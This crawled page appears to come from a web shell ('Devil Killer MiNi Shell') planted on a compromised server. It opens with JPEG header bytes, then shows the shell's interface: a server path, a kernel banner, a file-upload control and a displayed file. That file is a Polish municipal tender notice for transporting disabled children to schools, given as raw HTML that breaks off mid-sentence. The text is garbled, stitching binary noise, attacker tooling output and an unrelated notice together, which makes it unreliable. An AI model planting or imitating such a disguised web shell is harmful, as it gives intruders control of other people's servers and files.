JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230727/0032827501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych z terenu Gminy Białobrzegi do szkół lub ośrodków w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">CENTRUM USŁUG WSPÓLNYCH W BIAŁOBRZEGACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690380040</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Białobrzegi 4A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białobrzegi</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-114</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172245920</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oswiata@gmina-bialobrzegi.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.gmina-bialobrzegi.pl/jednostki-organizacyjne/cuw/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność rachunkowo-księgowa, doradztwo podatkowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych z terenu Gminy Białobrzegi do szkół lub ośrodków w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-37e823fa-2ba6-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00328275</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00327937/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz dzieci niepełnosprawnych z terenu Gminy Białobrzegi do szkół lub ośrodków w roku szkolnym 2023/2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-37e823fa-2ba6-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej oswiata@gmina-bialobrzegi.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-zamówienia.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https;//ezamowienia.gov.pl oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;. <br/>2) Wymagania techniczne i organizacyjne korzystania z Platformy e-Zamówienia określa jej Regulamin dostępny pod adresem https://ezamowienia.gov.pl/regulamin/#regulamin-serwisu <br/>3) Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4) Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>5) Dokumenty elektroniczne1, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. <br/>6) Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: a. w formatach danych określonych<br/>w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>7) Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>8) Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>9) Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). <br/>10) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>11) Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2023 r. poz. 57 z późn. zm.). W szczególności w formacie danych .doc, .docx, .xls, .xlsx, .pdf. 12) Szczegółowe informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w rozdz. XIII i XVII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (SWZ).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (SWZ).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">L.dz.481.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część numer 1 – „Dowóz dzieci i uczniów niepełnosprawnych z terenu Gminy Białobrzegi do Ośrodka Rewalidacyjno-Wychowawczego w Laszczynach w roku szkolnym 2023/2024”<br/><br/>Trasa: Białobrzegi Nr 205 (prawa strona)-Białobrzegi Nr 330 (lewa strona)-Budy Łańcuckie Nr 77 (prawa strona)-Budy Łańcuckie Nr 458 (lewa strona)-Ośrodek Rewalidacyjno-Wychowawczy w Laszczynach, Laszczyny 75a <br/>Liczba dzieci: 4 osoby<br/>Realizacja zadania polega na przewozie dzieci na trasie: dom – ośrodek – dom, pod opieką opiekuna. <br/>Długość trasy tam i z powrotem wynosi : ok 28 km.<br/><br/>1.	W trakcie realizacji zamówienia liczba przewożonych dzieci niepełnosprawnych oraz ilość kilometrów może ulec zmianie: zmniejszeniu oraz zwiększeniu - Wykonawca powinien uwzględnić ewentualne zwiększenie liczby dzieci o maksymalnie dwie osoby na każdej z części. Zamawiający zobowiązany jest informować Wykonawcę o każdej zmianie z co najmniej 7 - dniowym wyprzedzeniem, jednak cena zaoferowana za jeden dzień jest niezmienna przez cały okres realizacji zadania. <br/>2.	Przed przystąpieniem do realizacji usługi dowozu, Wykonawca ustali szczegółowy harmonogram dni i godzin dowozu z uwzględnieniem założeń, że uczniowie powinni być dowiezieni do szkoły w takim czasie, aby możliwe było punktualne rozpoczęcie przez nich zajęć i zabierani po ich zakończeniu bez zbędnego oczekiwania. Uczniowie objęci dowożeniem są odbierani i przywożeni pod adres zamieszkania. <br/>3.	Wykonawca oświadcza, że działa na podstawie zezwolenia/licencji, posiada uprawnienia oraz odpowiednie środki transportu, a także pracowników posiadających odpowiednie kwalifikacje i uprawnienia do wykonania niniejszej umowy zgodnie z obowiązującymi przepisami prawa. <br/>4.	Wykonawca zobowiązuje się do:<br/>-zapewnienia przewożonym uczniom bezpiecznych i higienicznych warunków podczas przewozu, <br/>-zapewnienia stałej i wykwalifikowanej opieki nad niepełnosprawnymi dziećmi (opiekun musi być osobą pełnoletnią oraz musi posiadać ukończony kurs pierwszej pomocy przedmedycznej) w czasie przewozu uczniów, z zastrzeżeniem, że kierowca nie może być jednocześnie opiekunem, <br/>-zapewnienia bezpieczeństwa przy wsiadaniu i wysiadaniu z pojazdu oraz w pojeździe,<br/>-wykonywania przewozów osobiście lub przez osoby przez niego zatrudnione, posiadające wymagane przepisami prawa uprawnienia i kwalifikacje, <br/>-wykonywania usługi środkiem transportu przystosowanym konstrukcyjnie do przewozu osób niepełnosprawnych, <br/>-punktualnego i terminowego podstawienia pojazdu w wyznaczonym punkcie odbioru ucznia, <br/>-utrzymania pojazdu w należytym stanie technicznym. Pojazd powinien posiadać aktualne ubezpieczenie OC i NW, aktualne badanie techniczne dopuszczające pojazd do ruchu. <br/>5. Podczas wykonywania usługi dowozu Wykonawca zobowiązany jest do stosowania przepisów dotyczących transportu zbiorowego uczniów niepełnosprawnych. <br/>6. Wykonawca nie ponosi odpowiedzialności za opóźnienie przewozy na skutek sytuacji nieprzewidzianych (intensywne opady śniegu, zawieje, powódź itp.)<br/>7. Strony zobowiązują się wzajemnie powiadomić o zaistniałych przeszkodach w wypełnianiu zobowiązań umownych w trakcie realizacji usługi. <br/>8. W razie niemożności wykonywania przewozu z przyczyn leżących po stronie Wykonawcy, Wykonawca zobowiązuje się do zapewnienia transportu zastępczego o takich samych parametrach. <br/>9. Wykonawca ponosi wyłączną odpowiedzialność wobec osób trzecich za szkody powstałe w związku z realizacją umowy. <br/>10. Dzieci niepełnosprawne zostają odbierane i przywożone pod adres zamieszkania. Dokładne adresy i wykaz dzieci objętych dowozem Zamawiający przekaże Wykonawcy, który zostanie wyłoniony w wyniku niniejszego postępowania przy podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie wg następujących kryteriów oceny ofert: <br/>1) Cena oferty za przedmiot zamówienia (waga 60%)<br/>(dotyczy części numer 1,2 i 3)<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali <br/>1-60 obliczone według wzoru:<br/><br/>„Pc”: Najniższa cena na daną część z oferowanych przez Wykonawców [brutto]<br/> Cena za daną część badanej oferty [brutto]<br/><br/>Pc – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/><br/>2)	Czas podstawienia zastępczego środka transportu (waga 40%) <br/>– najkrótszy możliwy czas podstawienia zastępczego środka transportu wymagany przez Zamawiającego wynosi 20 minut, a najdłuższy 50 minut <br/>(dot. części numer 1, 2 i 3)<br/><br/>Kryterium – „czas podstawienia zastępczego środka transportu” – poszczególnym ofertom zostaną przyznane punkty za czas podstawienia zastępczego środka transportu w skali 1-20 pkt obliczone według wzoru:<br/> <br/>„Pcz” : najkrótszy czas podstawienia zastępczego środka transportu w danej części<br/> badany czas podstawienia zastępczego środka transportu w danej części <br/> x 40 <br/>Pcz – ilość punktów przyznanych Wykonawcy dla kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Zamawiający do oceny kryterium „czas podstawienia zastępczego środka transportu” pobierze dane z oferty Wykonawcy.<br/>Jeżeli Wykonawca zaproponuje czas podstawienia krótszy niż 20 minut, do celów obliczenia punktów za to kryterium zostanie przyjęty 20 minutowy czas podstawienia. W przypadku niewpisania żadnego czasu podstawienia zastępczego środka transportu Zamawiający uzna, że czas podstawienia zastępczego środka transportu wynosi 50 min.<br/><br/>a)	Łączna ocena oferty:<br/><br/> P = Pc + Pcz <br/><br/>P – sumaryczna ilość punktów<br/>Pc – ilość punktów przyznanych Wykonawcy w kryterium „cena”<br/>Pcz – ilość punktów przyznanych Wykonawcy w kryterium „czas podstawienia zastępczego środka transportu”<br/><br/>Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.<br/><br/>2. Zamawiający udzieli zamówienia na daną część Wykonawcy, którego oferta zostanie oceniona jako najkorzystniejsza, tzn. uzyska najwyższą liczbę punktów w łącznej ocenie ofert. Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt.<br/>3. Zamawiający zastosuje zaokrąglanie wyników oceny do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia zastępczego środka transportu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część numer 2 – „Dowóz dzieci i uczniów niepełnosprawnych z terenu Gminy Białobrzegi do Specjalnego Ośrodka Szkolno-Wychowawczego w Leżajsku w roku szkolnym 2023/2024”<br/><br/>Trasa: Wola Dalsza Nr 173 i Nr 186-Specjalny Ośrodek Szkolno-Wychowawczy w Leżajsku, ul. Mickiewicza 76 oraz M. Skłodowskiej-Curie 8 (tam i z powrotem) <br/>Liczba dzieci: 2 osoby<br/>Realizacja zadania polega na przewozie dzieci na trasie: dom – ośrodek – dom, pod opieką opiekuna. <br/>Długość trasy tam i z powrotem wynosi : ok 60 km.<br/><br/>1.	W trakcie realizacji zamówienia liczba przewożonych dzieci niepełnosprawnych oraz ilość kilometrów może ulec zmianie: zmniejszeniu oraz zwiększeniu - Wykonawca powinien uwzględnić ewentualne zwiększenie liczby dzieci o maksymalnie dwie osoby na każdej z części. Zamawiający zobowiązany jest informować Wykonawcę o każdej zmianie z co najmniej 7 - dniowym wyprzedzeniem, jednak cena zaoferowana za jeden dzień jest niezmienna przez cały okres realizacji zadania. <br/>2.	Przed przystąpieniem do realizacji usługi dowozu, Wykonawca ustali szczegółowy harmonogram dni i godzin dowozu z uwzględnieniem założeń, że uczniowie powinni być dowiezieni do szkoły w takim czasie, aby możliwe było punktualne rozpoczęcie przez nich zajęć i zabierani po ich zakończeniu bez zbędnego oczekiwania. Uczniowie objęci dowożeniem są odbierani i przywożeni pod adres zamieszkania. <br/>3.	Wykonawca oświadcza, że działa na podstawie zezwolenia/licencji, posiada uprawnienia oraz odpowiednie środki transportu, a także pracowników posiadających odpowiednie kwalifikacje i uprawnienia do wykonania niniejszej umowy zgodnie z obowiązującymi przepisami prawa. <br/>4.	Wykonawca zobowiązuje się do:<br/>-zapewnienia przewożonym uczniom bezpiecznych i higienicznych warunków podczas przewozu, <br/>-zapewnienia stałej i wykwalifikowanej opieki nad niepełnosprawnymi dziećmi (opiekun musi być osobą pełnoletnią oraz musi posiadać ukończony kurs pierwszej pomocy przedmedycznej) w czasie przewozu uczniów, z zastrzeżeniem, że kierowca nie może być jednocześnie opiekunem, <br/>-zapewnienia bezpieczeństwa przy wsiadaniu i wysiadaniu z pojazdu oraz w pojeździe,<br/>-wykonywania przewozów osobiście lub przez osoby przez niego zatrudnione, posiadające wymagane przepisami prawa uprawnienia i kwalifikacje, <br/>-wykonywania usługi środkiem transportu przystosowanym konstrukcyjnie do przewozu osób niepełnosprawnych, <br/>-punktualnego i terminowego podstawienia pojazdu w wyznaczonym punkcie odbioru ucznia, <br/>-utrzymania pojazdu w należytym stanie technicznym. Pojazd powinien posiadać aktualne ubezpieczenie OC i NW, aktualne badanie techniczne dopuszczające pojazd do ruchu. <br/>5. Podczas wykonywania usługi dowozu Wykonawca zobowiązany jest do stosowania przepisów dotyczących transportu zbiorowego uczniów niepełnosprawnych. <br/>6. Wykonawca nie ponosi odpowiedzialności za opóźnienie przewozy na skutek sytuacji nieprzewidzianych (intensywne opady śniegu, zawieje, powódź itp.)<br/>7. Strony zobowiązują się wzajemnie powiadomić o zaistniałych przeszkodach w wypełnianiu zobowiązań umownych w trakcie realizacji usługi. <br/>8. W razie niemożności wykonywania przewozu z przyczyn leżących po stronie Wykonawcy, Wykonawca zobowiązuje się do zapewnienia transportu zastępczego o takich samych parametrach. <br/>9. Wykonawca ponosi wyłączną odpowiedzialność wobec osób trzecich za szkody powstałe w związku z realizacją umowy. <br/>10. Dzieci niepełnosprawne zostają odbierane i przywożone pod adres zamieszkania. Dokładne adresy i wykaz dzieci objętych dowozem Zamawiający przekaże Wykonawcy, który zostanie wyłoniony w wyniku niniejszego postępowania przy podpisaniu umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wybór oferty dokonany zostanie wg następujących kryteriów oceny ofert: <br/>1) Cena oferty za przedmiot zamówienia (waga 60%)<br/>(dotyczy części numer 1,2 i 3)<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali <br/>1-60 obliczone według wzoru:<br/><br/>„Pc”: Najniższa cena na daną część z oferowanych przez 